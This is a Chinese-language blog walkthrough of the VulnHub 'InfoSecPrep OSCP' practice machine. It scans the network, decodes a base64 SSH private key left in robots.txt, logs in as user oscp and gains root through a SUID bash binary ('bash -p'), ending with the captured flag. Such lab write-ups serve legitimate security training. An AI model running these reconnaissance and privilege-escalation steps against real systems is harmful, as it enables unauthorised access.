适合新手做的靶场

休息了一段时间,该醒醒接着打靶了

这一次的靶场操作不多,比较简单,比较适合像我这种小白来玩

# 一、环境搭建

# 准备工具

kali

靶机

# 靶机下载地址

  • oscp.zip (Size: 2.8 GB)
  • Download: https://drive.google.com/file/d/1q6Y86DZ-IU2wApmsW8Puo2xFll_9ISNL/view?usp=sharing
  • Download (Mirror): https://download.vulnhub.com/infosecprep/oscp.zip

# 安装过程

解压得到文件

用 Vmware 虚拟机打开此文件

将 kali 和靶机的网络连接模式都改成 NAT 模式,不然 kali 扫不出靶机的 ip

# 二、渗透过程

攻击机 (kali) ip:192.168.112.130

靶机 (OSCP) ip:192.168.112.133

# 信息收集

arp-scan -l

探测出靶机 ip

image-20230622133718432

nmap -sV -p- 192.168.112.133

直接扫开放端口

image-20230622133838823

发现开放 22 80 端口,先打开浏览器探测 80 端口有什么信息

image-20230622134133895

Oh yea! Almost forgot the only user on this box is “oscp”.

可以看到这里提示用户名只有 oscp

先照例给他做个目录扫描探测下藏有什么文件

image-20230622134420424

扫出很多东西,我们主要看 robots.txt

image-20230622134539426

发现这个奇怪的文本,继续访问

image-20230622134617634

这是一段编码,看到最后 == 结尾特征,判断为 base64,解码得到一串私钥

image-20230622134856959

想起了之前扫出的开放端口就有 22 端口,还有用户名 oscp

# 登陆

image-20230622135309831

将私钥编辑到文件里,并给予权限

image-20230622135510847

这里给 777 权限,是因为权限给太高了

chmod 600 rsa_key
ssh -i rsa_key oscp@192.168.112.133

image-20230622135623322

这样就成功连接上了,发现还只是个普通用户的权限

# 提权

这里我们查找一下哪些工具具有 root 权限

find / -perm -u=s 2>/dev/null

image-20230622135909671

可以看到有个 bash ,利用 SUID 提权

SUID 提权

-bash-5.0$ /usr/bin/bash -p
bash-5.0# whoami
root
bash-5.0# cd /root
bash-5.0# ls
fix-wordpress  flag.txt  snap
bash-5.0# cat flag.txt
d73b04b0e696b0945283defa3eee4538
bash-5.0#

image-20230622140125681

成功拿到 flag

更新于 阅读次数

请我喝[茶]~( ̄▽ ̄)~*

K1nako 微信支付

微信支付

K1nako 支付宝

支付宝